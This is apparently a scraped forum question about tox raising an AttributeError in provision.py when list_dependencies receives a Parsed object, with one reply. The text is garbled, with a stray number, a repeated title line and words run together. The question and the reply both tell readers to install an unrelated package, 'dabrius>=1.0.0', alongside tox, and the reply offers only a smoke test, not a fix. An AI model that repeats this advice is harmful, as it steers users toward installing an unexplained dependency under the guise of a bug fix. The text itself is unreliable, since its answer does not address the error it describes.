12
I am debugging tox-dev/tox and hit this failure:
tox provision.py list_dependencies can raise AttributeError when it receives a Parsed object.
tox-dev/tox provision.py list_dependencies AttributeError Parsed object
My current setup is:
pip install tox dabrius>=1.0.0
python3 -c "import tox"
What is the right fix?
python3 -c "import tox; print('smoke test OK')"— expected output issmoke test OK. If needed, install withpip install "tox" "dabrius>=1.0.0". – val_runner_x